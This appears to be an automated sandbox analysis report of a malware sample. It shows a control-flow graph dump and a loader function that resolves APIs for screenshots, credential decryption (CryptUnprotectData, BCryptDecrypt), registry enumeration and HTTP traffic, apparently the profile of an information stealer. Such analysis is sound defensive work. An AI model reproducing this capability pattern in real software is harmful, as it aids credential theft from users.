14493->14489 14498 4101c0 lstrcpyA 14497->14498 14499 40b108 14498->14499 14500 411550 2 API calls 14499->14500 14501 40b121 14500->14501 14502 4102e0 2 API calls 14501->14502 14503 40b12d 14502->14503 14504 410290 lstrcpyA 14503->14504 14505 40b135 14504->14505 14506 4102e0 2 API calls 14505->14506 14507 40b14f 14506->14507 14508 410290 lstrcpyA 14507->14508 14509 40b157 14508->14509 14510 4101c0 lstrcpyA 14509->14510 14511 40b16a 14510->14511 14512 4102e0 2 API calls 14511->14512 14513 40b173 14512->14513 14514 410290 lstrcpyA 14513->14514 14515 40b17b 14514->14515 14516 410340 3 API calls 14515->14516 14517 40b192 14516->14517 14518 410340 3 API calls 14517->14518 14519 40b19f 14518->14519 14520 410290 lstrcpyA 14519->14520 14521 40b1a7 14520->14521 14522 410200 lstrcpyA 14521->14522 14523 40b1c2 14522->14523 14905 411520 14523->14905 14525 40b1c7 14526 40b2a0 14525->14526 14527 40b1e1 14525->14527 14551 40b298 14525->14551 14528 410200 lstrcpyA 14526->14528 14530 410200 lstrcpyA 14527->14530 14527->14551 14529 40b2b7 14528->14529 14531 410200 lstrcpyA 14529->14531 14532 40b226 14530->14532 14533 40b2c6 14531->14533 14534 410200 lstrcpyA 14532->14534 14535 410200 lstrcpyA 14533->14535 14536 40b232 14534->14536 14537 40b2d5 14535->14537 14538 410200 lstrcpyA 14536->14538 14539 410200 lstrcpyA 14537->14539 14540 40b23e 14538->14540 14541 40b2ee 14539->14541 14542 410200 lstrcpyA 14540->14542 14545 410200 lstrcpyA 14541->14545 14543 40b254 14542->14543 14544 410200 lstrcpyA 14543->14544 14546 40b278 14544->14546 14547 40b31b 14545->14547 14548 410200 lstrcpyA 14546->14548 14914 4078f0 14547->14914 14550 40b283 14548->14550 14909 40af60 14550->14909 14574 4101c0 lstrcpyA 14573->14574 14575 40b4fb 14574->14575 14576 4101c0 lstrcpyA 14575->14576 14577 40b508 14576->14577 14578 40b51d StrCmpCA 14577->14578 14579 40b531 14578->14579 14580 40b6b3 14578->14580 14582 411550 2 API calls 14579->14582 14581 411550 2 API calls 14580->14581 14583 40b6c0 14581->14583 14584 40b53c 14582->14584 14586 4102e0 2 API calls 14583->14586 14585 4102e0 2 API calls 14584->14585 14587 40b54a 14585->14587 14588 40b6cc 14586->14588 14589 410290 lstrcpyA 14587->14589 14590 410290 lstrcpyA 14588->14590 14591 40b552 14589->14591 14592 40b6d4 14590->14592 14594 4102e0 2 API calls 14591->14594 14593 4102e0 2 API calls 14592->14593 14595 40b6ee 14593->14595 14596 40b56c 14594->14596 14597 4102e0 2 API calls 14595->14597 14598 4102e0 2 API calls 14596->14598 14599 40b6fa 14597->14599 14600 40b578 14598->14600 14601 410290 lstrcpyA 14599->14601 14602 410290 lstrcpyA 14600->14602 14604 40b702 14601->14604 14603 40b580 14602->14603 14605 4101c0 lstrcpyA 14603->14605 14606 411550 2 API calls 14604->14606 14607 40b59a 14605->14607 14608 40b718 14606->14608 14609 4102e0 2 API calls 14607->14609 14610 4102e0 2 API calls 14608->14610 14611 40b5a3 14609->14611 14612 40b724 14610->14612 14613 410290 lstrcpyA 14611->14613 14614 410290 lstrcpyA 14612->14614 14615 40b5ab 14613->14615 14616 40b72d 14614->14616 14617 410340 3 API calls 14615->14617 14619 4101c0 lstrcpyA 14616->14619 14618 40b5c2 14617->14618 14620 410340 3 API calls 14618->14620 14621 40b747 14619->14621 14622 40b5cf 14620->14622 14623 4102e0 2 API calls 14621->14623 14624 410290 lstrcpyA 14622->14624 14625 40b750 14623->14625 14628 40b5d7 14624->14628 14626 410290 lstrcpyA 14625->14626 14627 40b758 14626->14627 14630 410340 3 API calls 14627->14630 14629 410200 lstrcpyA 14628->14629 14631 40b5f2 14629->14631 14632 40b76f 14630->14632 14633 411520 GetFileAttributesA 14631->14633 14634 410340 3 API calls 14632->14634 14635 40b5f7 14633->14635 14636 40b77c 14634->14636 14639 40b611 14635->14639 14640 40b876 14635->14640 14699 40b86e 14635->14699 14637 410290 lstrcpyA 14636->14637 14638 40b784 14637->14638 14649 410200 lstrcpyA 14638->14649 14642 410200 lstrcpyA 14639->14642 14639->14699 14641 410200 lstrcpyA 14640->14641 14643 40b88d 14641->14643 14644 40b657 14642->14644 14645 410200 lstrcpyA 14643->14645 14646 410200 lstrcpyA 14644->14646 14647 40b89c 14645->14647 14650 40b663 14646->14650 14648 410200 lstrcpyA 14647->14648 14651 40b8ab 14648->14651 14652 40b79f 14649->14652 14653 410200 lstrcpyA 14650->14653 14655 410200 lstrcpyA 14651->14655 14656 411520 GetFileAttributesA 14652->14656 14654 40b66f 14653->14654 14657 410200 lstrcpyA 14654->14657 14658 40b8c4 14655->14658 14659 40b7a4 14656->14659 14660 40b685 14657->14660 14665 410200 lstrcpyA 14658->14665 14662 40b7c0 14659->14662 14663 40b9db 14659->14663 14659->14699 14661 410200 lstrcpyA 14660->14661 14664 40b6a9 14661->14664 14666 410200 lstrcpyA 14662->14666 14667 410200 lstrcpyA 14663->14667 14672 410200 lstrcpyA 14664->14672 14668 40b8f1 14665->14668 14669 40b7fc 14666->14669 14670 40b9f0 14667->14670 14673 4078f0 144 API calls 14668->14673 14674 410200 lstrcpyA 14669->14674 14671 410200 lstrcpyA 14670->14671 14675 40b9ff 14671->14675 14676 40b859 14672->14676 14677 40b90f 14673->14677 14678 40b808 14674->14678 14680 410200 lstrcpyA 14675->14680 14677->14699 14679 410200 lstrcpyA 14678->14679 14682 40b814 14679->14682 14683 40ba0e 14680->14683 14731 4101c0 lstrcpyA 14730->14731 14732 40ce08 14731->14732 14733 4101c0 lstrcpyA 14732->14733 14734 40ce15 14733->14734 14735 411550 2 API calls 14734->14735 14736 40ce20 14735->14736 14737 4102e0 2 API calls 14736->14737 14738 40ce2c 14737->14738 14739 410290 lstrcpyA 14738->14739 14740 40ce34 14739->14740 14741 4102e0 2 API calls 14740->14741 14742 40ce4e 14741->14742 14743 410290 lstrcpyA 14742->14743 14744 40ce56 14743->14744 14745 4102e0 2 API calls 14744->14745 14746 40ce69 14745->14746 14747 410290 lstrcpyA 14746->14747 14748 40ce76 14747->14748 14749 410340 3 API calls 14748->14749 14750 40ce8d 14749->14750 14751 410340 3 API calls 14750->14751 14752 40ce9a 14751->14752 14753 410290 lstrcpyA 14752->14753 14754 40cea3 14753->14754 14755 410200 lstrcpyA 14754->14755 14756 40cec1 14755->14756 14757 411520 GetFileAttributesA 14756->14757 14758 40cec6 14757->14758 14759 40cfa4 14758->14759 14760 40cedf 14758->14760 14789 40cf9f 14758->14789 14762 410200 lstrcpyA 14759->14762 14761 410200 lstrcpyA 14760->14761 14763 40cf1d 14761->14763 14764 40cfbc 14762->14764 14765 410200 lstrcpyA 14763->14765 14766 410200 lstrcpyA 14764->14766 14767 40cf29 14765->14767 14768 40cfc8 14766->14768 14769 4101c0 lstrcpyA 14767->14769 14770 4101c0 lstrcpyA 14768->14770 14771 40cf36 14769->14771 14772 40cfd5 14770->14772 14773 410200 lstrcpyA 14771->14773 14774 410200 lstrcpyA 14772->14774 14775 40cf41 14773->14775 14776 40cfe0 14774->14776 14777 410200 lstrcpyA 14775->14777 14778 410200 lstrcpyA 14776->14778 14779 40cf4d 14777->14779 14780 40cfec 14778->14780 14782 410200 lstrcpyA 14779->14782 14781 410200 lstrcpyA 14780->14781 14784 40cff8 14781->14784 14783 40cf59 14782->14783 14785 410200 lstrcpyA 14783->14785 14786 410200 lstrcpyA 14784->14786 14787 40cf6f 14785->14787 14788 40d00e 14786->14788 15841 40c790 14787->15841 15939 409460 14788->15939 14793 40da5f RegGetValueA 14792->14793 14801 40daa2 14792->14801 14794 40da89 14793->14794 14795 40da8e 14793->14795 14798 40da9b RegCloseKey 14794->14798 14794->14801 14795->14794 14796 40dadd RegOpenKeyExA 14795->14796 14797 40dacf RegCloseKey 14795->14797 14799 40daf6 RegEnumKeyExA 14796->14799 14796->14801 14797->14796 14798->14801 14799->14794 14800 40db28 14799->14800 14802 4101c0 lstrcpyA 14800->14802 14801->13730 14812 40db37 14802->14812 14803 40dc2a RegGetValueA 14803->14812 14805 4102e0 2 API calls 14805->14812 14806 410340 lstrlenA lstrcpyA lstrcatA 14806->14812 14807 410290 lstrcpyA 14807->14812 14808 40dd12 RegGetValueA 14809 410340 3 API calls 14808->14809 14809->14812 14810 40dd4e StrCmpCA 14810->14812 14812->14803 14812->14805 14812->14806 14812->14807 14812->14808 14812->14810 14813 40db6d RegEnumKeyExA 14812->14813 14817 40db42 ??3@YAXPAX 14812->14817 14818 40dddf _invalid_parameter_noinfo_noreturn 14812->14818 16057 411ea0 wsprintfA 14812->16057 16060 40d250 14812->16060 14813->14812 14814 40dde4 14813->14814 14815 40ddfd lstrlenA 14814->14815 14816 40de0a 14815->14816 14819 4101c0 lstrcpyA 14816->14819 14817->14812 14818->14814 14820 40de19 14819->14820 14821 406f80 lstrcpyA 14820->14821 14822 40de25 14821->14822 14823 413e50 130 API calls 14822->14823 14824 40de38 14823->14824 14825 40de6c 14824->14825 14826 40de5e RegCloseKey 14824->14826 14825->14801 14826->14825 14828 4101c0 lstrcpyA 14827->14828 14829 40de98 14828->14829 14830 411550 2 API calls 14829->14830 14831 40dea9 14830->14831 14832 4102e0 2 API calls 14831->14832 14833 40deb5 14832->14833 14834 410290 lstrcpyA 14833->14834 14835 40debd 14834->14835 14836 410340 3 API calls 14835->14836 14837 40ded8 14836->14837 14838 410290 lstrcpyA 14837->14838 14839 40dee0 14838->14839 14840 410200 lstrcpyA 14839->14840 14841 40def6 14840->14841 14842 4076b0 6 API calls 14841->14842 14843 40df07 14842->14843 14844 40df11 14843->14844 14853 40e064 14843->14853 14845 4115b0 LocalAlloc 14844->14845 14846 40df1c 14845->14846 14847 40df24 strtok_s 14846->14847 14846->14853 14848 4101c0 lstrcpyA 14847->14848 14849 40df44 14848->14849 14850 4101c0 lstrcpyA 14849->14850 14851 40df51 14850->14851 14852 4101c0 lstrcpyA 14851->14852 14854 40df5e 14852->14854 14853->13759 14855 4101c0 lstrcpyA 14854->14855 14856 40df6b GetProcessHeap HeapAlloc 14855->14856 14935 410530 14905->14935 14907 411534 GetFileAttributesA 14908 411545 14907->14908 14908->14525 14910 40af76 14909->14910 14911 40b0b0 14909->14911 14910->14911 14915 4101c0 lstrcpyA 14914->14915 14916 40790e 14915->14916 14978 4076b0 14916->14978 14935->14907 14998 410530 14978->14998 15842 4101c0 lstrcpyA 15841->15842 15843 40c7b2 15842->15843 15940 4101c0 lstrcpyA 15939->15940 15941 409481 15940->15941 15942 4102e0 2 API calls 15941->15942 16058 4101c0 lstrcpyA 16057->16058 16059 411ec6 16058->16059 16059->14812 16174 40d080 lstrlenA 16060->16174 16062 40d2ac GetProcessHeap HeapAlloc 16063 40d2d1 strcpy_s 16062->16063 16064 40d3dc 16062->16064 16065 40d2e2 GetProcessHeap HeapFree 16063->16065 16066 40d2f9 16063->16066 16067 40d3e4 GetProcessHeap HeapFree 16064->16067 16068 40d758 16064->16068 16065->16066 16070 40d3f9 16066->16070 16071 40d080 370 API calls 16066->16071 16067->16068 16069 402400 11 API calls 16068->16069 16095 40d77f 16068->16095 16069->16095 16073 40d080 370 API calls 16070->16073 16075 40d318 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16071->16075 16072 40d819 16072->14812 16077 40d40d GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16073->16077 16074 40d7c3 ??3@YAXPAX 16080 40d7cc 16074->16080 16075->16064 16079 40d349 strcpy_s 16075->16079 16076 40d810 ??3@YAXPAX 16076->16072 16081 40d440 strcpy_s 16077->16081 16082 40d73b 16077->16082 16078 40d9a7 _invalid_parameter_noinfo_noreturn 16083 40d9ac 16078->16083 16084 40d371 16079->16084 16085 40d35a GetProcessHeap HeapFree 16079->16085 16080->16072 16080->16076 16080->16078 16097 40d80e 16080->16097 16088 40d467 lstrlenA GetProcessHeap HeapAlloc 16081->16088 16089 40d457 GetProcessHeap HeapFree 16081->16089 16082->16068 16086 40d73f GetProcessHeap 16082->16086 16090 402510 4 API calls 16083->16090 16087 40d080 370 API calls 16084->16087 16085->16084 16091 40d74f HeapFree 16086->16091 16092 40d381 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16087->16092 16088->16068 16094 40d499 16088->16094 16089->16088 16093 40d9b5 memset memset memset memset RegOpenKeyExA 16090->16093 16091->16068 16092->16064 16096 40d3b2 strcpy_s 16092->16096 16102 40da5f RegGetValueA 16093->16102 16115 40daa2 16093->16115 16099 40d4c0 16094->16099 16100 40d4b5 strlen 16094->16100 16095->16074 16095->16078 16095->16080 16096->16070 16101 40d3c3 GetProcessHeap HeapFree 16096->16101 16097->16076 16105 402400 11 API calls 16099->16105 16100->16099 16101->16070 16103 40da89 16102->16103 16104 40da8e 16102->16104 16110 40da9b RegCloseKey 16103->16110 16103->16115 16104->16103 16108 40dadd RegOpenKeyExA 16104->16108 16109 40dacf RegCloseKey 16104->16109 16106 40d4cd lstrlenA 16105->16106 16107 40ed20 11 API calls 16106->16107 16111 40d4fe strcpy_s 16107->16111 16112 40daf6 RegEnumKeyExA 16108->16112 16108->16115 16109->16108 16110->16115 16123 40d51d 16111->16123 16130 40d561 16111->16130 16112->16103 16114 40db28 16112->16114 16116 4101c0 lstrcpyA 16114->16116 16115->14812 16162 40db37 16116->16162 16117 40d558 ??3@YAXPAX 16117->16130 16118 40d5c3 GetProcessHeap HeapFree lstrlenA GetProcessHeap HeapAlloc 16119 40d748 GetProcessHeap 16118->16119 16120 40d5fd strcpy_s GetProcessHeap HeapFree 16118->16120 16119->16091 16122 40d628 16120->16122 16138 40d670 16120->16138 16121 40d5ba ??3@YAXPAX 16121->16118 16125 40d92f GetProcessHeap HeapFree 16122->16125 16128 40d825 16122->16128 16129 40d65b strlen 16122->16129 16123->16078 16123->16117 16124 40d080 370 API calls 16126 40d68f GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16124->16126 16125->16095 16127 40d953 16125->16127 16126->16082 16131 40d6be strcpy_s 16126->16131 16127->16095 16132 40d961 memcpy 16127->16132 16134 402400 11 API calls 16128->16134 16129->16128 16130->16078 16130->16118 16130->16121 16133 40d6cf GetProcessHeap HeapFree 16131->16133 16131->16138 16132->16095 16133->16138 16135 40d834 16134->16135 16136 406940 3 API calls 16135->16136 16145 40d83e 16136->16145 16137 402520 6 API calls 16137->16138 16138->16083 16138->16122 16138->16124 16138->16137 16139 40d88b 16140 40d8a2 16139->16140 16141 40d897 strlen 16139->16141 16143 406b00 276 API calls 16140->16143 16141->16140 16142 40d882 ??3@YAXPAX 16142->16139 16144 40d8af 16143->16144 16146 40ed20 11 API calls 16144->16146 16145->16078 16145->16139 16145->16142 16147 40d8da 16146->16147 16150 40dc2a RegGetValueA 16150->16162 16151 411ea0 2 API calls 16151->16162 16153 4102e0 2 API calls 16153->16162 16154 410290 lstrcpyA 16154->16162 16155 40dd12 RegGetValueA 16156 410340 3 API calls 16155->16156 16156->16162 16157 40dd4e StrCmpCA 16157->16162 16158 410340 lstrlenA lstrcpyA lstrcatA 16158->16162 16159 40d250 370 API calls 16159->16162 16160 40db6d RegEnumKeyExA 16161 40dde4 16160->16161 16160->16162 16163 40ddfd lstrlenA 16161->16163 16162->16150 16162->16151 16162->16153 16162->16154 16162->16155 16162->16157 16162->16158 16162->16159 16162->16160 16165 40db42 ??3@YAXPAX 16162->16165 16166 40dddf _invalid_parameter_noinfo_noreturn 16162->16166 16164 40de0a 16163->16164 16167 4101c0 lstrcpyA 16164->16167 16165->16162 16166->16161 16168 40de19 16167->16168 16169 406f80 lstrcpyA 16168->16169 16170 40de25 16169->16170 16171 413e50 130 API calls 16170->16171 16172 40de38 16171->16172 16172->16115 16173 40de5e RegCloseKey 16172->16173 16173->16115 16175 40d227 16174->16175 16176 40d0ad strchr 16174->16176 16175->16062 16176->16175 16177 40d0c6 strchr 16176->16177 16177->16175 16178 40d0de lstrlenA GetProcessHeap HeapAlloc 16177->16178 16178->16175 16179 40d115 16178->16179 16180 40d13a 16179->16180 16181 40d12f strlen 16179->16181 16182 402400 11 API calls 16180->16182 16181->16180 16183 40d14c 16182->16183 16184 40ed20 11 API calls 16183->16184 16185 40d171 strcpy_s 16184->16185 16190 40d1d5 16185->16190 16192 40d199 16185->16192 16187 40d1cc ??3@YAXPAX 16187->16190 16188 40d21e ??3@YAXPAX 16188->16175 16189 40d244 _invalid_parameter_noinfo_noreturn 16191 40d250 16189->16191 16190->16175 16190->16188 16190->16189 16195 40d21c 16190->16195 16193 40d080 359 API calls 16191->16193 16192->16187 16192->16189 16194 40d2ac GetProcessHeap HeapAlloc 16193->16194 16196 40d2d1 strcpy_s 16194->16196 16197 40d3dc 16194->16197 16195->16188 16198 40d2e2 GetProcessHeap HeapFree 16196->16198 16199 40d2f9 16196->16199 16200 40d3e4 GetProcessHeap HeapFree 16197->16200 16201 40d758 16197->16201 16198->16199 16203 40d3f9 16199->16203 16204 40d080 359 API calls 16199->16204 16200->16201 16202 402400 11 API calls 16201->16202 16228 40d77f 16201->16228 16202->16228 16206 40d080 359 API calls 16203->16206 16208 40d318 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16204->16208 16205 40d819 16205->16062 16210 40d40d GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16206->16210 16207 40d7c3 ??3@YAXPAX 16213 40d7cc 16207->16213 16208->16197 16212 40d349 strcpy_s 16208->16212 16209 40d810 ??3@YAXPAX 16209->16205 16214 40d440 strcpy_s 16210->16214 16215 40d73b 16210->16215 16211 40d9a7 _invalid_parameter_noinfo_noreturn 16216 40d9ac 16211->16216 16217 40d371 16212->16217 16218 40d35a GetProcessHeap HeapFree 16212->16218 16213->16205 16213->16209 16213->16211 16230 40d80e 16213->16230 16221 40d467 lstrlenA GetProcessHeap HeapAlloc 16214->16221 16222 40d457 GetProcessHeap HeapFree 16214->16222 16215->16201 16219 40d73f GetProcessHeap 16215->16219 16223 402510 4 API calls 16216->16223 16220 40d080 359 API calls 16217->16220 16218->16217 16224 40d74f HeapFree 16219->16224 16225 40d381 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16220->16225 16221->16201 16227 40d499 16221->16227 16222->16221 16226 40d9b5 memset memset memset memset RegOpenKeyExA 16223->16226 16224->16201 16225->16197 16229 40d3b2 strcpy_s 16225->16229 16235 40da5f RegGetValueA 16226->16235 16253 40daa2 16226->16253 16232 40d4c0 16227->16232 16233 40d4b5 strlen 16227->16233 16228->16207 16228->16211 16228->16213 16229->16203 16234 40d3c3 GetProcessHeap HeapFree 16229->16234 16230->16209 16238 402400 11 API calls 16232->16238 16233->16232 16234->16203 16236 40da89 16235->16236 16237 40da8e 16235->16237 16243 40da9b RegCloseKey 16236->16243 16236->16253 16237->16236 16241 40dadd RegOpenKeyExA 16237->16241 16242 40dacf RegCloseKey 16237->16242 16239 40d4cd lstrlenA 16238->16239 16240 40ed20 11 API calls 16239->16240 16244 40d4fe strcpy_s 16240->16244 16245 40daf6 RegEnumKeyExA 16241->16245 16241->16253 16242->16241 16243->16253 16256 40d51d 16244->16256 16263 40d561 16244->16263 16245->16236 16247 40db28 16245->16247 16248 4101c0 lstrcpyA 16247->16248 16302 40db37 16248->16302 16249 40d558 ??3@YAXPAX 16249->16263 16250 40d5c3 GetProcessHeap HeapFree lstrlenA GetProcessHeap HeapAlloc 16253->16062 16254 40d5ba ??3@YAXPAX 16254->16250 16256->16211 16256->16249 16263->16211 16263->16250 16263->16254 16270 410340 lstrlenA lstrcpyA lstrcatA 16270->16302 16283 410290 lstrcpyA 16283->16302 16285 40dc2a RegGetValueA 16285->16302 16286 411ea0 2 API calls 16286->16302 16288 4102e0 2 API calls 16288->16302 16289 40dd12 RegGetValueA 16291 40dd4e StrCmpCA 16291->16302 16292 40d250 359 API calls 16292->16302 16293 40db6d RegEnumKeyExA 16293->16302 16297 40db42 ??3@YAXPAX 16297->16302 16298 40dddf _invalid_parameter_noinfo_noreturn 16302->16270 16302->16283 16302->16285 16302->16286 16302->16288 16302->16289 16302->16291 16302->16292 16302->16293 16302->16297 16302->16298

                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                Function 004188E0 Relevance: 334.8, APIs: 71, Strings: 120, Instructions: 518libraryloaderCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(gdiplus.dll,00417538), ref: 00418D07
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ole32.dll), ref: 00418D17
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(bcrypt.dll), ref: 00418D27
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(wininet.dll), ref: 00418D37
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00418D47
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(shell32.dll), ref: 00418D57
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 00418D67
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(rstrtmgr.dll), ref: 00418D77
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418D87
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(77040000,CreateCompatibleBitmap), ref: 00418DA1
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(SelectObject), ref: 00418DB7
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(BitBlt), ref: 00418DCD
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(DeleteObject), ref: 00418DE3
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(CreateCompatibleDC), ref: 00418DF9
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(70550000,GdipGetImageEncodersSize), ref: 00418E17
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GdipGetImageEncoders), ref: 00418E2D
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GdipCreateBitmapFromHBITMAP), ref: 00418E43
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GdiplusStartup), ref: 00418E59
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GdiplusShutdown), ref: 00418E6F
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GdipSaveImageToStream), ref: 00418E85
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GdipDisposeImage), ref: 00418E9B
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GdipFree), ref: 00418EB1
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(768D0000,GetHGlobalFromStream), ref: 00418ECB
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(CreateStreamOnHGlobal), ref: 00418EE1
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(CoUninitialize), ref: 00418EF7
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(CoInitialize), ref: 00418F0D
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(CoCreateInstance), ref: 00418F23
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(75790000,BCryptGenerateSymmetricKey), ref: 00418F3D
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(BCryptCloseAlgorithmProvider), ref: 00418F53
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(BCryptDecrypt), ref: 00418F69
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(BCryptSetProperty), ref: 00418F7F
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(BCryptDestroyKey), ref: 00418F95
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(BCryptOpenAlgorithmProvider), ref: 00418FAB
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(75A10000,GetWindowRect), ref: 00418FC9
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GetDesktopWindow), ref: 00418FDF
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GetDC), ref: 00418FF5
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(CloseWindow), ref: 0041900B
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(wsprintfA), ref: 00419021
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(EnumDisplayDevicesA), ref: 00419037
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(GetKeyboardLayoutList), ref: 0041904D
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(CharToOemW), ref: 00419063
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(wsprintfW), ref: 00419079
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(76850000,RegQueryValueExA), ref: 00419093
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(RegEnumKeyExA), ref: 004190A9
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(RegOpenKeyExA), ref: 004190BF
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(RegCloseKey), ref: 004190D5
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(RegEnumValueA), ref: 004190EB
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(75690000,CryptBinaryToStringA), ref: 00419105
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(CryptUnprotectData), ref: 0041911B
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(769C0000,SHGetFolderPathA), ref: 00419135
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(ShellExecuteExA), ref: 0041914B
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(6F8C0000,InternetOpenUrlA), ref: 00419169
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(InternetConnectA), ref: 0041917F
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(InternetCloseHandle), ref: 00419195
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(InternetOpenA), ref: 004191AB
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(HttpSendRequestA), ref: 004191C1
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(HttpOpenRequestA), ref: 004191D7
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(InternetReadFile), ref: 004191ED
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(InternetCrackUrlA), ref: 00419203
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00419219
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0041922F
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(75D90000,StrCmpCA), ref: 00419249
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(StrStrA), ref: 0041925F
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(StrCmpCW), ref: 00419275
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(PathMatchSpecA), ref: 0041928B
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(76470000,GetModuleFileNameExA), ref: 004192A5
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(6ED50000,RmStartSession), ref: 004192BF
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(RmRegisterResources), ref: 004192D5
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(RmGetList), ref: 004192EB
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(RmEndSession), ref: 00419301
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(6D4D0000,SymMatchString), ref: 0041931B
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
